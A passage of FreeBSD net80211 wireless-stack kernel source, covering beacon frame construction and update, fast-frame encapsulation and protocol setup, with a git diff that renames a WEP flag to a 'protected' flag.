XXX how big is this? */ pktlen = 8 /* time stamp */ + sizeof(uint16_t) /* beacon interval */ + sizeof(uint16_t) /* capabilities */ + 2 + ni->ni_esslen /* ssid */ + 2 + IEEE80211_RATE_SIZE /* supported rates */ + 2 + 1 /* DS parameters */ + 2 + 6 /* CF parameters */ + 2 + 4 + vap->iv_tim_len /* DTIM/IBSSPARMS */ + IEEE80211_COUNTRY_MAX_SIZE /* country */ + 2 + 1 /* power control */ + sizeof(struct ieee80211_csa_ie) /* CSA */ + sizeof(struct ieee80211_quiet_ie) /* Quiet */ + 2 + 1 /* ERP */ + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + (vap->iv_caps & IEEE80211_C_WPA ? /* WPA 1+2 */ 2*sizeof(struct ieee80211_ie_wpa) : 0) /* XXX conditional? */ + 4+2*sizeof(struct ieee80211_ie_htcap)/* HT caps */ + 4+2*sizeof(struct ieee80211_ie_htinfo)/* HT info */ + (vap->iv_caps & IEEE80211_C_WME ? /* WME */ sizeof(struct ieee80211_wme_param) : 0) #ifdef IEEE80211_SUPPORT_SUPERG + sizeof(struct ieee80211_ath_ie) /* ATH */ #endif #ifdef IEEE80211_SUPPORT_TDMA + (vap->iv_caps & IEEE80211_C_TDMA ? /* TDMA */ sizeof(struct ieee80211_tdma_param) : 0) #endif #ifdef IEEE80211_SUPPORT_MESH + 2 + ni->ni_meshidlen + sizeof(struct ieee80211_meshconf_ie) #endif + IEEE80211_MAX_APPIE ; m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), pktlen); if (m == NULL) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_ANY, "%s: cannot get buf; size %u\n", __func__, pktlen); vap->iv_stats.is_tx_nobuf++; return NULL; } ieee80211_beacon_construct(m, frm, bo, ni); M_PREPEND(m, sizeof(struct ieee80211_frame), M_NOWAIT); KASSERT(m != NULL, ("no space for 802.11 header?")); wh = mtod(m, struct ieee80211_frame *); wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_BEACON; wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; *(uint16_t *)wh->i_dur = 0; IEEE80211_ADDR_COPY(wh->i_addr1, ifp->if_broadcastaddr); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, ni->ni_bssid); *(uint16_t *)wh->i_seq = 0; return m; } /* * Update the dynamic parts of a beacon frame based on the current state. */ int ieee80211_beacon_update(struct ieee80211_node *ni, struct ieee80211_beacon_offsets *bo, struct mbuf *m, int mcast) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; int len_changed = 0; uint16_t capinfo; struct ieee80211_frame *wh; ieee80211_seq seqno; IEEE80211_LOCK(ic); /* * Handle 11h channel change when we've reached the count. * We must recalculate the beacon frame contents to account * for the new channel. Note we do this only for the first * vap that reaches this point; subsequent vaps just update * their beacon state to reflect the recalculated channel. */ if (isset(bo->bo_flags, IEEE80211_BEACON_CSA) && vap->iv_csa_count == ic->ic_csa_count) { vap->iv_csa_count = 0; /* * Effect channel change before reconstructing the beacon * frame contents as many places reference ni_chan. */ if (ic->ic_csa_newchan != NULL) ieee80211_csa_completeswitch(ic); /* * NB: ieee80211_beacon_construct clears all pending * updates in bo_flags so we don't need to explicitly * clear IEEE80211_BEACON_CSA. */ ieee80211_beacon_construct(m, mtod(m, uint8_t*) + sizeof(struct ieee80211_frame), bo, ni); /* XXX do WME aggressive mode processing? */ IEEE80211_UNLOCK(ic); return 1; /* just assume length changed */ } wh = mtod(m, struct ieee80211_frame *); seqno = ni->ni_txseqs[IEEE80211_NONQOS_TID]++; *(uint16_t *)&wh->i_seq[0] = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); M_SEQNO_SET(m, seqno); /* XXX faster to recalculate entirely or just changes? */ capinfo = ieee80211_getcapinfo(vap, ni->ni_chan); *bo->bo_caps = htole16(capinfo); if (vap->iv_flags & IEEE80211_F_WME) { struct ieee80211_wme_state *wme = &ic->ic_wme; /* * Check for agressive mode change. When there is * significant high priority traffic in the BSS * throttle back BE traffic by using conservative * parameters. Otherwise BE uses agressive params * to optimize performance of legacy/non-QoS traffic. */ if (wme->wme_flags & WME_F_AGGRMODE) { if (wme->wme_hipri_traffic > wme->wme_hipri_switch_thresh) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "%s: traffic %u, disable aggressive mode\n", __func__, wme->wme_hipri_traffic); wme->wme_flags &= ~WME_F_AGGRMODE; ieee80211_wme_updateparams_locked(vap); wme->wme_hipri_traffic = wme->wme_hipri_switch_hysteresis; } else wme->wme_hipri_traffic = 0; } else { if (wme->wme_hipri_traffic <= wme->wme_hipri_switch_thresh) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "%s: traffic %u, enable aggressive mode\n", __func__, wme->wme_hipri_traffic); wme->wme_flags |= WME_F_AGGRMODE; ieee80211_wme_updateparams_locked(vap); wme->wme_hipri_traffic = 0; } else wme->wme_hipri_traffic = wme->wme_hipri_switch_hysteresis; } if (isset(bo->bo_flags, IEEE80211_BEACON_WME)) { (void) ieee80211_add_wme_param(bo->bo_wme, wme); clrbit(bo->bo_flags, IEEE80211_BEACON_WME); } } if (isset(bo->bo_flags, IEEE80211_BEACON_HTINFO)) { ieee80211_ht_update_beacon(vap, bo); clrbit(bo->bo_flags, IEEE80211_BEACON_HTINFO); } #ifdef IEEE80211_SUPPORT_TDMA if (vap->iv_caps & IEEE80211_C_TDMA) { /* * NB: the beacon is potentially updated every TBTT. */ ieee80211_tdma_update_beacon(vap, bo); } #endif #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) ieee80211_mesh_update_beacon(vap, bo); #endif if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS) { /* NB: no IBSS support*/ struct ieee80211_tim_ie *tie = (struct ieee80211_tim_ie *) bo->bo_tim; if (isset(bo->bo_flags, IEEE80211_BEACON_TIM)) { u_int timlen, timoff, i; /* * ATIM/DTIM needs updating. If it fits in the * current space allocated then just copy in the * new bits. Otherwise we need to move any trailing * data to make room. Note that we know there is * contiguous space because ieee80211_beacon_allocate * insures there is space in the mbuf to write a * maximal-size virtual bitmap (based on iv_max_aid). */ /* * Calculate the bitmap size and offset, copy any * trailer out of the way, and then copy in the * new bitmap and update the information element. * Note that the tim bitmap must contain at least * one byte and any offset must be even. */ if (vap->iv_ps_pending != 0) { timoff = 128; /* impossibly large */ for (i = 0; i < vap->iv_tim_len; i++) if (vap->iv_tim_bitmap[i]) { timoff = i &~ 1; break; } KASSERT(timoff != 128, ("tim bitmap empty!")); for (i = vap->iv_tim_len-1; i >= timoff; i--) if (vap->iv_tim_bitmap[i]) break; timlen = 1 + (i - timoff); } else { timoff = 0; timlen = 1; } if (timlen != bo->bo_tim_len) { /* copy up/down trailer */ int adjust = tie->tim_bitmap+timlen - bo->bo_tim_trailer; ovbcopy(bo->bo_tim_trailer, bo->bo_tim_trailer+adjust, bo->bo_tim_trailer_len); bo->bo_tim_trailer += adjust; bo->bo_erp += adjust; bo->bo_htinfo += adjust; #ifdef IEEE80211_SUPPORT_SUPERG bo->bo_ath += adjust; #endif #ifdef IEEE80211_SUPPORT_TDMA bo->bo_tdma += adjust; #endif #ifdef IEEE80211_SUPPORT_MESH bo->bo_meshconf += adjust; #endif bo->bo_appie += adjust; bo->bo_wme += adjust; bo->bo_csa += adjust; bo->bo_quiet += adjust; bo->bo_tim_len = timlen; /* update information element */ tie->tim_len = 3 + timlen; tie->tim_bitctl = timoff; len_changed = 1; } memcpy(tie->tim_bitmap, vap->iv_tim_bitmap + timoff, bo->bo_tim_len); clrbit(bo->bo_flags, IEEE80211_BEACON_TIM); IEEE80211_DPRINTF(vap, IEEE80211_MSG_POWER, "%s: TIM updated, pending %u, off %u, len %u\n", __func__, vap->iv_ps_pending, timoff, timlen); } /* count down DTIM period */ if (tie->tim_count == 0) tie->tim_count = tie->tim_period - 1; else tie->tim_count--; /* update state for buffered multicast frames on DTIM */ if (mcast && tie->tim_count == 0) tie->tim_bitctl |= 1; else tie->tim_bitctl &= ~1; if (isset(bo->bo_flags, IEEE80211_BEACON_CSA)) { struct ieee80211_csa_ie *csa = (struct ieee80211_csa_ie *) bo->bo_csa; /* * Insert or update CSA ie. If we're just starting * to count down to the channel switch then we need * to insert the CSA ie. Otherwise we just need to * drop the count. The actual change happens above * when the vap's count reaches the target count. */ if (vap->iv_csa_count == 0) { memmove(&csa[1], csa, bo->bo_csa_trailer_len); bo->bo_erp += sizeof(*csa); bo->bo_htinfo += sizeof(*csa); bo->bo_wme += sizeof(*csa); #ifdef IEEE80211_SUPPORT_SUPERG bo->bo_ath += sizeof(*csa); #endif #ifdef IEEE80211_SUPPORT_TDMA bo->bo_tdma += sizeof(*csa); #endif #ifdef IEEE80211_SUPPORT_MESH bo->bo_meshconf += sizeof(*csa); #endif bo->bo_appie += sizeof(*csa); bo->bo_csa_trailer_len += sizeof(*csa); bo->bo_quiet += sizeof(*csa); bo->bo_tim_trailer_len += sizeof(*csa); m->m_len += sizeof(*csa); m->m_pkthdr.len += sizeof(*csa); ieee80211_add_csa(bo->bo_csa, vap); } else csa->csa_count--; vap->iv_csa_count++; /* NB: don't clear IEEE80211_BEACON_CSA */ } if (IEEE80211_IS_CHAN_DFS(ic->ic_bsschan) && (vap->iv_flags_ext & IEEE80211_FEXT_DFS) ){ if (vap->iv_quiet) ieee80211_add_quiet(bo->bo_quiet, vap); } if (isset(bo->bo_flags, IEEE80211_BEACON_ERP)) { /* * ERP element needs updating. */ (void) ieee80211_add_erp(bo->bo_erp, ic); clrbit(bo->bo_flags, IEEE80211_BEACON_ERP); } #ifdef IEEE80211_SUPPORT_SUPERG if (isset(bo->bo_flags, IEEE80211_BEACON_ATH)) { ieee80211_add_athcaps(bo->bo_ath, ni); clrbit(bo->bo_flags, IEEE80211_BEACON_ATH); } #endif } if (isset(bo->bo_flags, IEEE80211_BEACON_APPIE)) { const struct ieee80211_appie *aie = vap->iv_appie_beacon; int aielen; uint8_t *frm; aielen = 0; if (aie != NULL) aielen += aie->ie_len; if (aielen != bo->bo_appie_len) { /* copy up/down trailer */ int adjust = aielen - bo->bo_appie_len; ovbcopy(bo->bo_tim_trailer, bo->bo_tim_trailer+adjust, bo->bo_tim_trailer_len); bo->bo_tim_trailer += adjust; bo->bo_appie += adjust; bo->bo_appie_len = aielen; len_changed = 1; } frm = bo->bo_appie; if (aie != NULL) frm = add_appie(frm, aie); clrbit(bo->bo_flags, IEEE80211_BEACON_APPIE); } IEEE80211_UNLOCK(ic); return len_changed; } /* * Do Ethernet-LLC encapsulation for each payload in a fast frame * tunnel encapsulation. The frame is assumed to have an Ethernet * header at the front that must be stripped before prepending the * LLC followed by the Ethernet header passed in (with an Ethernet * type that specifies the payload size). */ struct mbuf * ieee80211_ff_encap1(struct ieee80211vap *vap, struct mbuf *m, const struct ether_header *eh) { struct llc *llc; uint16_t payload; /* XXX optimize by combining m_adj+M_PREPEND */ m_adj(m, sizeof(struct ether_header) - sizeof(struct llc)); llc = mtod(m, struct llc *); llc->llc_dsap = llc->llc_ssap = LLC_SNAP_LSAP; llc->llc_control = LLC_UI; llc->llc_snap.org_code[0] = 0; llc->llc_snap.org_code[1] = 0; llc->llc_snap.org_code[2] = 0; llc->llc_snap.ether_type = eh->ether_type; payload = m->m_pkthdr.len; /* NB: w/o Ethernet header */ M_PREPEND(m, sizeof(struct ether_header), M_NOWAIT); if (m == NULL) { /* XXX cannot happen */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_SUPERG, "%s: no space for ether_header\n", __func__); vap->iv_stats.is_tx_nobuf++; return NULL; } ETHER_HEADER_COPY(mtod(m, void *), eh); mtod(m, struct ether_header *)->ether_type = htons(payload); return m; } /* * Complete an mbuf transmission. * * For now, this simply processes a completed frame after the * driver has completed it's transmission and/or retransmission. * It assumes the frame is an 802.11 encapsulated frame. * * Later on it will grow to become the exit path for a given frame * from the driver and, depending upon how it's been encapsulated * and already transmitted, it may end up doing A-MPDU retransmission, * power save requeuing, etc. * * In order for the above to work, the driver entry point to this * must not hold any driver locks. Thus, the driver needs to delay * any actual mbuf completion until it can release said locks. * * This frees the mbuf and if the mbuf has a node reference, * the node reference will be freed. */ void ieee80211_tx_complete(struct ieee80211_node *ni, struct mbuf *m, int status) { if (ni != NULL) { if (m->m_flags & M_TXCB) ieee80211_process_callback(ni, m, status); ieee80211_free_node(ni); } m_freem(m); } diff --git a/sys/net80211/ieee80211_proto.c b/sys/net80211/ieee80211_proto.c index 751c44d73971..2f84769f9907 100644 --- a/sys/net80211/ieee80211_proto.c +++ b/sys/net80211/ieee80211_proto.c @@ -1,1996 +1,1996 @@ /*- * Copyright (c) 2001 Atsushi Onoe * Copyright (c) 2002-2008 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include __FBSDID("$FreeBSD$"); /* * IEEE 802.11 protocol support. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include /* XXX for ether_sprintf */ #include #include #include #include #include #ifdef IEEE80211_SUPPORT_MESH #include #endif #include #include /* XXX tunables */ #define AGGRESSIVE_MODE_SWITCH_HYSTERESIS 3 /* pkts / 100ms */ #define HIGH_PRI_SWITCH_THRESH 10 /* pkts / 100ms */ const char *ieee80211_mgt_subtype_name[] = { "assoc_req", "assoc_resp", "reassoc_req", "reassoc_resp", "probe_req", "probe_resp", "reserved#6", "reserved#7", "beacon", "atim", "disassoc", "auth", "deauth", "action", "action_noack", "reserved#15" }; const char *ieee80211_ctl_subtype_name[] = { "reserved#0", "reserved#1", "reserved#2", "reserved#3", "reserved#3", "reserved#5", "reserved#6", "reserved#7", "reserved#8", "reserved#9", "ps_poll", "rts", "cts", "ack", "cf_end", "cf_end_ack" }; const char *ieee80211_opmode_name[IEEE80211_OPMODE_MAX] = { "IBSS", /* IEEE80211_M_IBSS */ "STA", /* IEEE80211_M_STA */ "WDS", /* IEEE80211_M_WDS */ "AHDEMO", /* IEEE80211_M_AHDEMO */ "HOSTAP", /* IEEE80211_M_HOSTAP */ "MONITOR", /* IEEE80211_M_MONITOR */ "MBSS" /* IEEE80211_M_MBSS */ }; const char *ieee80211_state_name[IEEE80211_S_MAX] = { "INIT", /* IEEE80211_S_INIT */ "SCAN", /* IEEE80211_S_SCAN */ "AUTH", /* IEEE80211_S_AUTH */ "ASSOC", /* IEEE80211_S_ASSOC */ "CAC", /* IEEE80211_S_CAC */ "RUN", /* IEEE80211_S_RUN */ "CSA", /* IEEE80211_S_CSA */ "SLEEP", /* IEEE80211_S_SLEEP */ }; const char *ieee80211_wme_acnames[] = { "WME_AC_BE", "WME_AC_BK", "WME_AC_VI", "WME_AC_VO", "WME_UPSD", }; static void beacon_miss(void *, int); static void beacon_swmiss(void *, int); static void parent_updown(void *, int); static void update_mcast(void *, int); static void update_promisc(void *, int); static void update_channel(void *, int); static void update_chw(void *, int); static void ieee80211_newstate_cb(void *, int); static int null_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = ni->ni_ic->ic_ifp; if_printf(ifp, "missing ic_raw_xmit callback, drop frame\n"); m_freem(m); return ENETDOWN; } void ieee80211_proto_attach(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; /* override the 802.3 setting */ ifp->if_hdrlen = ic->ic_headroom + sizeof(struct ieee80211_qosframe_addr4) + IEEE80211_WEP_IVLEN + IEEE80211_WEP_KIDLEN + IEEE80211_WEP_EXTIVLEN; /* XXX no way to recalculate on ifdetach */ if (ALIGN(ifp->if_hdrlen) > max_linkhdr) { /* XXX sanity check... */ max_linkhdr = ALIGN(ifp->if_hdrlen); max_hdr = max_linkhdr + max_protohdr; max_datalen = MHLEN - max_hdr; } ic->ic_protmode = IEEE80211_PROT_CTSONLY; TASK_INIT(&ic->ic_parent_task, 0, parent_updown, ifp); TASK_INIT(&ic->ic_mcast_task, 0, update_mcast, ic); TASK_INIT(&ic->ic_promisc_task, 0, update_promisc, ic); TASK_INIT(&ic->ic_chan_task, 0, update_channel, ic); TASK_INIT(&ic->ic_bmiss_task, 0, beacon_miss, ic); TASK_INIT(&ic->ic_chw_task, 0, update_chw, ic); ic->ic_wme.wme_hipri_switch_hysteresis = AGGRESSIVE_MODE_SWITCH_HYSTERESIS; /* initialize management frame handlers */ ic->ic_send_mgmt = ieee80211_send_mgmt; ic->ic_raw_xmit = null_raw_xmit; ieee80211_adhoc_attach(ic); ieee80211_sta_attach(ic); ieee80211_wds_attach(ic); ieee80211_hostap_attach(ic); #ifdef IEEE80211_SUPPORT_MESH ieee80211_mesh_attach(ic); #endif ieee80211_monitor_attach(ic); } void ieee80211_proto_detach(struct ieee80211com *ic) { ieee80211_monitor_detach(ic); #ifdef IEEE80211_SUPPORT_MESH ieee80211_mesh_detach(ic); #endif ieee80211_hostap_detach(ic); ieee80211_wds_detach(ic); ieee80211_adhoc_detach(ic); ieee80211_sta_detach(ic); } static void null_update_beacon(struct ieee80211vap *vap, int item) { } void ieee80211_proto_vattach(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = vap->iv_ifp; int i; /* override the 802.3 setting */ ifp->if_hdrlen = ic->ic_ifp->if_hdrlen; vap->iv_rtsthreshold = IEEE80211_RTS_DEFAULT; vap->iv_fragthreshold = IEEE80211_FRAG_DEFAULT; vap->iv_bmiss_max = IEEE80211_BMISS_MAX; callout_init_mtx(&vap->iv_swbmiss, IEEE80211_LOCK_OBJ(ic), 0); callout_init(&vap->iv_mgtsend, CALLOUT_MPSAFE); TASK_INIT(&vap->iv_nstate_task, 0, ieee80211_newstate_cb, vap); TASK_INIT(&vap->iv_swbmiss_task, 0, beacon_swmiss, vap); /* * Install default tx rate handling: no fixed rate, lowest * supported rate for mgmt and multicast frames. Default * max retry count. These settings can be changed by the * driver and/or user applications. */ for (i = IEEE80211_MODE_11A; i < IEEE80211_MODE_MAX; i++) { const struct ieee80211_rateset *rs = &ic->ic_sup_rates[i]; vap->iv_txparms[i].ucastrate = IEEE80211_FIXED_RATE_NONE; /* * Setting the management rate to MCS 0 assumes that the * BSS Basic rate set is empty and the BSS Basic MCS set * is not. * * Since we're not checking this, default to the lowest * defined rate for this mode. * * At least one 11n AP (DLINK DIR-825) is reported to drop * some MCS management traffic (eg BA response frames.) * * See also: 9.6.0 of the 802.11n-2009 specification. */ #ifdef NOTYET if (i == IEEE80211_MODE_11NA || i == IEEE80211_MODE_11NG) { vap->iv_txparms[i].mgmtrate = 0 | IEEE80211_RATE_MCS; vap->iv_txparms[i].mcastrate = 0 | IEEE80211_RATE_MCS; } else { vap->iv_txparms[i].mgmtrate = rs->rs_rates[0] & IEEE80211_RATE_VAL; vap->iv_txparms[i].mcastrate = rs->rs_rates[0] & IEEE80211_RATE_VAL; } #endif vap->iv_txparms[i].mgmtrate = rs->rs_rates[0] & IEEE80211_RATE_VAL; vap->iv_txparms[i].mcastrate = rs->rs_rates[0] & IEEE80211_RATE_VAL; vap->iv_txparms[i].maxretry = IEEE80211_TXMAX_DEFAULT; } vap->iv_roaming = IEEE80211_ROAMING_AUTO; vap->iv_update_beacon = null_update_beacon; vap->iv_deliver_data = ieee80211_deliver_data; /* attach support for operating mode */ ic->ic_vattach[vap->iv_opmode](vap); } void ieee80211_proto_vdetach(struct ieee80211vap *vap) { #define FREEAPPIE(ie) do { \ if (ie != NULL) \ free(ie, M_80211_NODE_IE); \ } while (0) /* * Detach operating mode module. */ if (vap->iv_opdetach != NULL) vap->iv_opdetach(vap); /* * This should not be needed as we detach when reseting * the state but be conservative here since the * authenticator may do things like spawn kernel threads. */ if (vap->iv_auth->ia_detach != NULL) vap->iv_auth->ia_detach(vap); /* * Detach any ACL'ator. */ if (vap->iv_acl != NULL) vap->iv_acl->iac_detach(vap); FREEAPPIE(vap->iv_appie_beacon); FREEAPPIE(vap->iv_appie_probereq); FREEAPPIE(vap->iv_appie_proberesp); FREEAPPIE(vap->iv_appie_assocreq); FREEAPPIE(vap->iv_appie_assocresp); FREEAPPIE(vap->iv_appie_wpa); #undef FREEAPPIE } /* * Simple-minded authenticator module support. */ #define IEEE80211_AUTH_MAX (IEEE80211_AUTH_WPA+1) /* XXX well-known names */ static const char *auth_modnames[IEEE80211_AUTH_MAX] = { "wlan_internal", /* IEEE80211_AUTH_NONE */ "wlan_internal", /* IEEE80211_AUTH_OPEN */ "wlan_internal", /* IEEE80211_AUTH_SHARED */ "wlan_xauth", /* IEEE80211_AUTH_8021X */ "wlan_internal", /* IEEE80211_AUTH_AUTO */ "wlan_xauth", /* IEEE80211_AUTH_WPA */ }; static const struct ieee80211_authenticator *authenticators[IEEE80211_AUTH_MAX]; static const struct ieee80211_authenticator auth_internal = { .ia_name = "wlan_internal", .ia_attach = NULL, .ia_detach = NULL, .ia_node_join = NULL, .ia_node_leave = NULL, }; /* * Setup internal authenticators once; they are never unregistered. */ static void ieee80211_auth_setup(void) { ieee80211_authenticator_register(IEEE80211_AUTH_OPEN, &auth_internal); ieee80211_authenticator_register(IEEE80211_AUTH_SHARED, &auth_internal); ieee80211_authenticator_register(IEEE80211_AUTH_AUTO, &auth_internal); } SYSINIT(wlan_auth, SI_SUB_DRIVERS, SI_ORDER_FIRST, ieee80211_auth_setup, NULL); const struct ieee80211_authenticator * ieee80211_authenticator_get(int auth) { if (auth >= IEEE80211_AUTH_MAX) return NULL; if (authenticators[auth] == NULL) ieee80211_load_module(auth_modnames[auth]); return authenticators[auth]; } void ieee80211_authenticator_register(int type, const struct ieee80211_authenticator *auth) { if (type >= IEEE80211_AUTH_MAX) return; authenticators[type] = auth; } void ieee80211_authenticator_unregister(int type) { if (type >= IEEE80211_AUTH_MAX) return; authenticators[type] = NULL; } /* * Very simple-minded ACL module support. */ /* XXX just one for now */ static const struct ieee80211_aclator *acl = NULL; void ieee80211_aclator_register(const struct ieee80211_aclator *iac) { printf("wlan: %s acl policy registered\n", iac->iac_name); acl = iac; } void ieee80211_aclator_unregister(const struct ieee80211_aclator *iac) { if (acl == iac) acl = NULL; printf("wlan: %s acl policy unregistered\n", iac->iac_name); } const struct ieee80211_aclator * ieee80211_aclator_get(const char *name) { if (acl == NULL) ieee80211_load_module("wlan_acl"); return acl != NULL && strcmp(acl->iac_name, name) == 0 ? acl : NULL; } void ieee80211_print_essid(const uint8_t *essid, int len) { const uint8_t *p; int i; if (len > IEEE80211_NWID_LEN) len = IEEE80211_NWID_LEN; /* determine printable or not */ for (i = 0, p = essid; i < len; i++, p++) { if (*p < ' ' || *p > 0x7e) break; } if (i == len) { printf("\""); for (i = 0, p = essid; i < len; i++, p++) printf("%c", *p); printf("\""); } else { printf("0x"); for (i = 0, p = essid; i < len; i++, p++) printf("%02x", *p); } } void ieee80211_dump_pkt(struct ieee80211com *ic, const uint8_t *buf, int len, int rate, int rssi) { const struct ieee80211_frame *wh; int i; wh = (const struct ieee80211_frame *)buf; switch (wh->i_fc[1] & IEEE80211_FC1_DIR_MASK) { case IEEE80211_FC1_DIR_NODS: printf("NODS %s", ether_sprintf(wh->i_addr2)); printf("->%s", ether_sprintf(wh->i_addr1)); printf("(%s)", ether_sprintf(wh->i_addr3)); break; case IEEE80211_FC1_DIR_TODS: printf("TODS %s", ether_sprintf(wh->i_addr2)); printf("->%s", ether_sprintf(wh->i_addr3)); printf("(%s)", ether_sprintf(wh->i_addr1)); break; case IEEE80211_FC1_DIR_FROMDS: printf("FRDS %s", ether_sprintf(wh->i_addr3)); printf("->%s", ether_sprintf(wh->i_addr1)); printf("(%s)", ether_sprintf(wh->i_addr2)); break; case IEEE80211_FC1_DIR_DSTODS: printf("DSDS %s", ether_sprintf((const uint8_t *)&wh[1])); printf("->%s", ether_sprintf(wh->i_addr3)); printf("(%s", ether_sprintf(wh->i_addr2)); printf("->%s)", ether_sprintf(wh->i_addr1)); break; } switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_DATA: printf(" data"); break; case IEEE80211_FC0_TYPE_MGT: printf(" %s", ieee80211_mgt_subtype_name[ (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT]); break; default: printf(" type#%d", wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK); break; } if (IEEE80211_QOS_HAS_SEQ(wh)) { const struct ieee80211_qosframe *qwh = (const struct ieee80211_qosframe *)buf; printf(" QoS [TID %u%s]", qwh->i_qos[0] & IEEE80211_QOS_TID, qwh->i_qos[0] & IEEE80211_QOS_ACKPOLICY ? " ACM" : ""); } - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { int off; off = ieee80211_anyhdrspace(ic, wh); printf(" WEP [IV %.02x %.02x %.02x", buf[off+0], buf[off+1], buf[off+2]); if (buf[off+IEEE80211_WEP_IVLEN] & IEEE80211_WEP_EXTIV) printf(" %.02x %.02x %.02x", buf[off+4], buf[off+5], buf[off+6]); printf(" KID %u]", buf[off+IEEE80211_WEP_IVLEN] >> 6); } if (rate >= 0) printf(" %dM", rate / 2); if (rssi >= 0) printf(" +%d", rssi); printf("\n"); if (len > 0) { for (i = 0; i < len; i++) { if ((i & 1) == 0) printf(" "); printf("%02x", buf[i]); } printf("\n"); } } static __inline int findrix(const struct ieee80211_rateset *rs, int r) { int i; for (i = 0; i < rs->rs_nrates; i++) if ((rs->rs_rates[i] & IEEE80211_RATE_VAL) == r) return i; return -1; } int ieee80211_fix_rate(struct ieee80211_node *ni, struct ieee80211_rateset *nrs, int flags) { #define RV(v) ((v) & IEEE80211_RATE_VAL) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; int i, j, rix, error; int okrate, badrate, fixedrate, ucastrate; const struct ieee80211_rateset *srs; uint8_t r; error = 0; okrate = badrate = 0; ucastrate = vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)].ucastrate; if (ucastrate != IEEE80211_FIXED_RATE_NONE) { /* * Workaround awkwardness with fixed rate. We are called * to check both the legacy rate set and the HT rate set * but we must apply any legacy fixed rate check only to the * legacy rate set and vice versa. We cannot tell what type * of rate set we've been given (legacy or HT) but we can * distinguish the fixed rate type (MCS have 0x80 set). * So to deal with this the caller communicates whether to * check MCS or legacy rate using the flags and we use the * type of any fixed rate to avoid applying an MCS to a * legacy rate and vice versa. */ if (ucastrate & 0x80) { if (flags & IEEE80211_F_DOFRATE) flags &= ~IEEE80211_F_DOFRATE; } else if ((ucastrate & 0x80) == 0) { if (flags & IEEE80211_F_DOFMCS) flags &= ~IEEE80211_F_DOFMCS; } /* NB: required to make MCS match below work */ ucastrate &= IEEE80211_RATE_VAL; } fixedrate = IEEE80211_FIXED_RATE_NONE; /* * XXX we are called to process both MCS and legacy rates; * we must use the appropriate basic rate set or chaos will * ensue; for now callers that want MCS must supply * IEEE80211_F_DOBRS; at some point we'll need to split this * function so there are two variants, one for MCS and one * for legacy rates. */ if (flags & IEEE80211_F_DOBRS) srs = (const struct ieee80211_rateset *) ieee80211_get_suphtrates(ic, ni->ni_chan); else srs = ieee80211_get_suprates(ic, ni->ni_chan); for (i = 0; i < nrs->rs_nrates; ) { if (flags & IEEE80211_F_DOSORT) { /* * Sort rates. */ for (j = i + 1; j < nrs->rs_nrates; j++) { if (RV(nrs->rs_rates[i]) > RV(nrs->rs_rates[j])) { r = nrs->rs_rates[i]; nrs->rs_rates[i] = nrs->rs_rates[j]; nrs->rs_rates[j] = r; } } } r = nrs->rs_rates[i] & IEEE80211_RATE_VAL; badrate = r; /* * Check for fixed rate. */ if (r == ucastrate) fixedrate = r; /* * Check against supported rates. */ rix = findrix(srs, r); if (flags & IEEE80211_F_DONEGO) { if (rix < 0) { /* * A rate in the node's rate set is not * supported. If this is a basic rate and we * are operating as a STA then this is an error. * Otherwise we just discard/ignore the rate. */ if ((flags & IEEE80211_F_JOIN) && (nrs->rs_rates[i] & IEEE80211_RATE_BASIC)) error++; } else if ((flags & IEEE80211_F_JOIN) == 0) { /* * Overwrite with the supported rate * value so any basic rate bit is set. */ nrs->rs_rates[i] = srs->rs_rates[rix]; } } if ((flags & IEEE80211_F_DODEL) && rix < 0) { /* * Delete 